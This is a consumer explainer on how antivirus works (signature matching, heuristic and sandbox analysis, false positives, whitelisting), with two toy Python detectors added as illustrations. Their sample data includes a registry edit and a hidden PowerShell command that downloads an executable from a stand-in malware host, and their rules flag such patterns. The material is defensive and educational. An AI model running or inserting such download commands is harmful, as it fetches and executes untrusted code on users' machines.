Antivirus is the major line of defense between your computer and malware infections. Most people let antivirus run quietly in the background, self-update automatically when required, and perform scheduled scans. That is all fine and well, and there is nothing wrong with letting antivirus software do its own thing. However, you can get far more from your antivirus protection by understanding how it really works: once you understand the hows and whys of what the software does, you will be able to fine-tune its settings to your specific needs.
You’ll also be able to find out whether there are particular functions or features of antivirus software you do not actually need. While many people are tempted either to subscribe to the highest tier an antivirus vendor offers or to go for the most basic protection available, you will be able to narrow down your choices much better once you understand what specific features actually do for you.
As soon as you’re more familiar with basic antivirus functions, you can more easily follow along with the antivirus reviews at AV-Best, which compare some of the most popular antivirus products and what they offer the consumer. With all that said, let’s get into how antivirus software really works. There are two chief methods antivirus software uses to protect the user from malware:
- Signature-based detection
- Heuristic analysis
We’ll explore these two in more depth, but the gist is: signature-based detection scans files for known threats. It is like a trespass ban list at a theme park, where specific individuals are listed by name for denial of entry. Heuristic analysis scans files for known virus behaviour.
Continuing the theme park analogy, heuristic analysis is like looking for the people on the banned list even when they are wearing a fake mustache and glasses. Those are vast simplifications of signature-based detection and heuristic analysis, merely to give you a basic idea, so now we will describe them in more detail.
What’s signature-based detection?
As we mentioned, signature-based detection compares files against the antivirus program’s signature database. If a match is found, the file is instantly quarantined (in many cases — it depends on your application settings). Of course, it is not really the “file” as a whole that is looked up in the antivirus database.
The antivirus database is not just a big list of filenames such that anything called “BigScaryVirus.exe” is automatically quarantined. What signature-based detection actually searches for is the code a file would execute. Because viruses are just strings of code (instructions) delivered to the computer, the antivirus software tries to determine what actions a file performs when it is launched.
These can range from trying to run administrative commands in the background, to contacting known malicious web servers and attempting to run scripts that install unwanted programs.
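To make the point above concrete, here is a toy signature scanner, added as an illustration and not taken from any antivirus product. Signatures are hashes of known bad files or byte patterns lifted from their code, so the verdict depends on file contents and never on the filename; the signature list and sample files are constructed, and the EICAR string is the industry-standard harmless test pattern.

```python
"""Toy signature-based scanner: an added illustration, not any product's code."""
import hashlib

# Industry-standard harmless test pattern that real scanners detect by signature.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
# Constructed stand-in for a known malicious binary (a vendor ships only the hash).
KNOWN_BAD_BLOB = b"MZ\x90\x00demo-dropper-body"

# Constructed signature database: exact-file hashes and byte patterns, each named.
HASH_SIGNATURES = {hashlib.sha256(KNOWN_BAD_BLOB).hexdigest(): "Demo.Dropper.A"}
PATTERN_SIGNATURES = {
    EICAR: "EICAR-Test-File",
    b"http://malware.example/update.bin": "Demo.Downloader.B",
}

# Constructed files to scan: filename -> contents.
SAMPLE_FILES = {
    "BigScaryVirus.exe": b"MZ\x90\x00 harmless demo program with a scary name",
    "dropper.exe": KNOWN_BAD_BLOB,
    "eicar.com": EICAR,
    "notes.txt": b"the installer fetches http://malware.example/update.bin",
}


def scan_bytes(data: bytes) -> str:
    """Return the matching signature name, or 'clean' if nothing matches."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGNATURES:          # cheapest check: whole-file hash
        return HASH_SIGNATURES[digest]
    for pattern, name in PATTERN_SIGNATURES.items():
        if pattern in data:                # substring match on file contents
            return name
    return "clean"


def scan_files(files: dict) -> dict:
    """Map each filename to its verdict; quarantining is a separate decision."""
    return {name: scan_bytes(data) for name, data in files.items()}


if __name__ == "__main__":
    for name, verdict in scan_files(SAMPLE_FILES).items():
        print(f"{name:20} {verdict}")
```

Note that "BigScaryVirus.exe" comes back clean and "notes.txt" is flagged: the name plays no part, only the bytes do.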
What’s heuristic analysis?
As we mentioned earlier in this guide, if signature-based detection is the banned list at a theme park, heuristic analysis is spotting the banned people who try to sneak in wearing a fake mustache. The way this actually works in antivirus software is that, when a file is scanned, it may not contain any “known” virus code routines.
It is not an immediately recognizable threat. But it may contain suspicious code patterns, like a script that tries to change critical Windows files in typical virus style. Heuristic analysis therefore opens the file in a sandbox environment to find out what would happen if the program were actually allowed to run.
Because the program is not permitted to escape the virtual sandbox, any potentially malicious code is never allowed to run on the machine itself. Aside from the sandbox, a newer approach to heuristic analysis uses machine learning and data mining. In this approach, algorithms classify the behavior of a file by extracting certain attributes from the file itself.
Configuring antivirus security is tricky business
While we are making the process sound rather simple, antivirus developers must take particular care to balance the sensitivity of the heuristic analysis. When it is too weak, it will let viruses pass. But if it is too strong, it will raise false positives on files that don’t actually contain any malicious code.
Some companies take the approach that stronger security is better, and so their antivirus software may have a propensity to give more false positives. Other vendors don’t want to bother the user and may ship more relaxed security settings. It is truly a challenging balancing act.
As a particular example, imagine you download a program for entirely altering the look of the Windows Start menu. This program lets you add custom images to the Windows GUI, creating an entirely unique user experience. Now, because this application modifies Windows system files, some antivirus software will detect it as a threat, and possibly quarantine (or automatically delete) the app.
I personally use one such program, for changing my whole Windows system to a black theme. As we said, it is hard for antivirus developers to fine-tune and balance their heuristic analysis without inconveniencing the user with a lot of false positives. Of course, the user can always manually adjust the general security settings of the antivirus software, and add certain files and folders to the antivirus software’s whitelist so that the antivirus completely ignores them.
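The following toy static heuristic scorer, added here as an illustration and not any vendor's code, ties together the heuristic analysis section and the balancing act just described: each rule awards points for a suspicious trait, a file is flagged when its score reaches the sensitivity threshold, and a whitelisted folder is skipped entirely. The rules, thresholds, sample scripts and whitelist folder are all constructed; the theme installer writes to System32 and so lands exactly on the false-positive boundary.

```python
"""Toy heuristic scorer with sensitivity threshold and whitelist (added example)."""
import re

# Constructed rules: (name, pattern over file bytes, weight).  Each mirrors a
# trait the article mentions: touching Windows system files, running admin
# commands in the background, and fetching executables from the web.
RULES = [
    ("writes-to-system32", re.compile(rb"C:\\Windows\\System32\\", re.I), 3),
    ("registry-edit", re.compile(rb"\breg(\.exe)?\s+add\b", re.I), 2),
    ("hidden-powershell", re.compile(rb"powershell.*-w(indowstyle)?\s+hidden", re.I), 3),
    ("downloads-executable", re.compile(rb"https?://\S+\.(exe|bin)\b", re.I), 2),
]

STRICT, RELAXED = 3, 5                    # two vendors' sensitivity settings
WHITELIST = ("C:\\Tools\\DarkTheme\\",)   # folder the user told the AV to ignore

# Constructed sample scripts: full path -> contents.
SAMPLES = {
    r"C:\Tools\DarkTheme\install.bat":
        b"copy dark.msstyles C:\\Windows\\System32\\ /y\r\n",
    r"C:\Users\me\Downloads\update.bat":
        b"reg add HKCU\\Software\\Demo /f\r\n"
        b"powershell -w hidden -c \"Invoke-WebRequest http://malware.example/a.exe\"\r\n",
    r"C:\Users\me\Downloads\hello.bat": b"@echo hello\r\n",
}


def score(data: bytes):
    """Sum the weights of every rule that fires; also report which ones fired."""
    fired = [name for name, pattern, _ in RULES if pattern.search(data)]
    total = sum(weight for name, _, weight in RULES if name in fired)
    return total, fired


def verdict(path: str, data: bytes, threshold: int, whitelist=()) -> str:
    """Whitelist wins outright; otherwise compare the score to the threshold."""
    if any(path.lower().startswith(folder.lower()) for folder in whitelist):
        return "whitelisted"
    total, _ = score(data)
    return "suspicious" if total >= threshold else "clean"


if __name__ == "__main__":
    for path, data in SAMPLES.items():
        print(path, score(data),
              "strict:", verdict(path, data, STRICT),
              "relaxed:", verdict(path, data, RELAXED),
              "strict+whitelist:", verdict(path, data, STRICT, WHITELIST))
```

The theme installer is "suspicious" under the strict setting, "clean" under the relaxed one, and ignored once its folder is whitelisted, while the real dropper scores well above both thresholds.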
Real-time and Web Protection
While conventional malware typically came from infected files that a user intentionally downloaded, like an infected email attachment, the net has evolved beyond that. Today a user can get infected in many different ways. Plugging an infected flash drive into your computer is a common one, as malware can detect when a flash drive is plugged in and replicate itself between drives.
Users may also become infected simply by surfing the web without adequate real-time protection. Cybercriminals have become sophisticated enough to embed malicious scripts in website code, and even in banner ads, which can take advantage of security holes in the user’s browser software. 2016 saw the growth of crypto-miner scripts, where merely visiting a site hosting one of those scripts could hijack your CPU power to mine cryptocurrency.